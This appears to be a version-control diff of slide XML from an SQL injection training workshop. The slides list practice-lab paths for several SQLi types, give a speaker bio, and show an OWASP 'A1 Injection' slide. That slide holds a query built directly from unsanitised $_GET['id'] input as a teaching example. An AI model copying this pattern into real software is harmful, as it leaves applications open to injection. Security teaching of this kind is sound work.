+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>| Blind SQLi    | sqli.uid0.sh/blind  |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>| Out of Band   | sqli.uid0.sh/oob    |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>| ¯\_(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>ツ</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>)_/¯   | sqli.uid0.sh/leet   |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -3973,14 +3650,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="101" name="CustomShape 1"/>
+          <p:cNvPr id="105" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3375720" y="1951920"/>
-            <a:ext cx="4748400" cy="2559240"/>
+            <a:off x="3769560" y="493200"/>
+            <a:ext cx="3838320" cy="364320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4010,178 +3687,9 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>select workshop, url from workshops;</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>+-------------------------------------+</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| Home.         | sqli.uid0.sh.       |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| In Band       | sqli.uid0.sh/ib     |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| Blind SQLi    | sqli.uid0.sh/blind  |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| Error Based   | sqli.uid0.sh/error  |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| Out of Band   | sqli.uid0.sh/oob    |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>| ¯\_(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>ツ</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>)_/¯    | sqli.uid0.sh/leet   |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>+-------------------------------------+</a:t>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>select solutions from workshops;</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -4191,76 +3699,33 @@
       </p:sp>
     </p:spTree>
   </p:cSld>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide12.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="102" name="CustomShape 1"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="3769560" y="493200"/>
-            <a:ext cx="3838680" cy="364680"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="0"/>
-          <a:fillRef idx="0"/>
-          <a:effectRef idx="0"/>
-          <a:fontRef idx="minor"/>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>select solutions from workshops;</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="21" dur="indefinite" restart="never" nodeType="tmRoot">
+          <p:childTnLst>
+            <p:seq>
+              <p:cTn id="22" dur="indefinite" nodeType="mainSeq"/>
+              <p:prevCondLst>
+                <p:cond delay="0" evt="onPrev">
+                  <p:tgtEl>
+                    <p:sldTgt/>
+                  </p:tgtEl>
+                </p:cond>
+              </p:prevCondLst>
+              <p:nextCondLst>
+                <p:cond delay="0" evt="onNext">
+                  <p:tgtEl>
+                    <p:sldTgt/>
+                  </p:tgtEl>
+                </p:cond>
+              </p:nextCondLst>
+            </p:seq>
+          </p:childTnLst>
+        </p:cTn>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
 </p:sld>
 </file>
 
@@ -4283,14 +3748,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="85" name="TextShape 1"/>
-          <p:cNvSpPr txBox="1"/>
+          <p:cNvPr id="79" name="CustomShape 1"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="328680" y="534240"/>
-            <a:ext cx="11465640" cy="6133320"/>
+            <a:ext cx="11465280" cy="6132960"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4300,8 +3765,14 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
@@ -4323,10 +3794,7 @@
               <a:t>Not really through space and time… just over from Adelaide.</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -4339,10 +3807,7 @@
               </a:spcBef>
             </a:pPr>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -4364,10 +3829,7 @@
               <a:t>@vortexau – vortex.id.au</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -4380,10 +3842,7 @@
               </a:spcBef>
             </a:pPr>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -4405,10 +3864,7 @@
               <a:t>Perpetual Noob.</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -4421,10 +3877,7 @@
               </a:spcBef>
             </a:pPr>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -4446,10 +3899,7 @@
               <a:t>Adelaide SecTalks organizer.</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -4462,10 +3912,7 @@
               </a:spcBef>
             </a:pPr>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -4487,10 +3934,7 @@
               <a:t>Pentester @ DXC Security, based in Adelaide.</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -4503,10 +3947,7 @@
               </a:spcBef>
             </a:pPr>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -4528,10 +3969,7 @@
               <a:t>In CBR for a two-week engagement.</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
           <a:p>
@@ -4553,10 +3991,7 @@
               <a:t>:wq</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -4612,14 +4047,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="86" name="CustomShape 1"/>
+          <p:cNvPr id="80" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="4243320" y="1849320"/>
-            <a:ext cx="3585240" cy="2833560"/>
+            <a:ext cx="3584880" cy="2833200"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4649,6 +4084,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>select topics from contents;</a:t>
             </a:r>
@@ -4668,6 +4104,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>+--------------------------+</a:t>
             </a:r>
@@ -4687,6 +4124,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| OWASP Top10              |</a:t>
             </a:r>
@@ -4706,6 +4144,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| In-Band SQLi             |</a:t>
             </a:r>
@@ -4725,6 +4164,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| Blind SQLi               |</a:t>
             </a:r>
@@ -4744,6 +4184,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| Out of Band SQLi         |</a:t>
             </a:r>
@@ -4763,6 +4204,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| Mitigation of SQLi.      |</a:t>
             </a:r>
@@ -4782,6 +4224,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| Dinner SQLi              |</a:t>
             </a:r>
@@ -4801,6 +4244,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>| Workshop SQLi            |</a:t>
             </a:r>
@@ -4820,6 +4264,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>+--------------------------+</a:t>
             </a:r>
@@ -4880,14 +4325,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="87" name="CustomShape 1"/>
+          <p:cNvPr id="81" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="274320" y="182880"/>
-            <a:ext cx="4571640" cy="364680"/>
+            <a:ext cx="4571280" cy="364320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4917,6 +4362,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>Owasp Top 10, 2017</a:t>
             </a:r>
@@ -4928,14 +4374,14 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="88" name="TextShape 2"/>
-          <p:cNvSpPr txBox="1"/>
+          <p:cNvPr id="82" name="CustomShape 2"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="4937760" y="182880"/>
-            <a:ext cx="2560320" cy="2489400"/>
+            <a:ext cx="2559960" cy="2489040"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4945,9 +4391,20 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
         <p:txBody>
           <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
           <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
             <a:r>
               <a:rPr b="0" lang="en-US" sz="18000" spc="-1" strike="noStrike">
                 <a:solidFill>
@@ -4958,24 +4415,21 @@
               <a:t>A1</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="18000" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="89" name="TextShape 3"/>
-          <p:cNvSpPr txBox="1"/>
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="83" name="CustomShape 3"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="5120640" y="2286000"/>
-            <a:ext cx="4206240" cy="491040"/>
+            <a:ext cx="4205880" cy="490680"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4985,9 +4439,20 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
         <p:txBody>
           <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
           <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
             <a:r>
               <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                 <a:solidFill>
@@ -4998,24 +4463,21 @@
               <a:t>Injection</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="90" name="TextShape 4"/>
-          <p:cNvSpPr txBox="1"/>
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="84" name="CustomShape 4"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="4846320" y="3143520"/>
-            <a:ext cx="2286000" cy="331200"/>
+            <a:ext cx="2285640" cy="330840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5025,9 +4487,20 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
         <p:txBody>
           <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
           <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
             <a:r>
               <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                 <a:solidFill>
@@ -5038,24 +4511,21 @@
               <a:t>www.site.com/?id=1</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="91" name="TextShape 5"/>
-          <p:cNvSpPr txBox="1"/>
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="85" name="CustomShape 5"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="2743200" y="3657600"/>
-            <a:ext cx="7223760" cy="572040"/>
+            <a:ext cx="7223400" cy="571680"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5065,9 +4535,20 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
         <p:txBody>
           <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
           <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
             <a:r>
               <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                 <a:solidFill>
@@ -5078,24 +4559,21 @@
               <a:t>select item, description from products where id = $_GET[‘id’]</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="92" name="TextShape 6"/>
-          <p:cNvSpPr txBox="1"/>
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="86" name="CustomShape 6"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
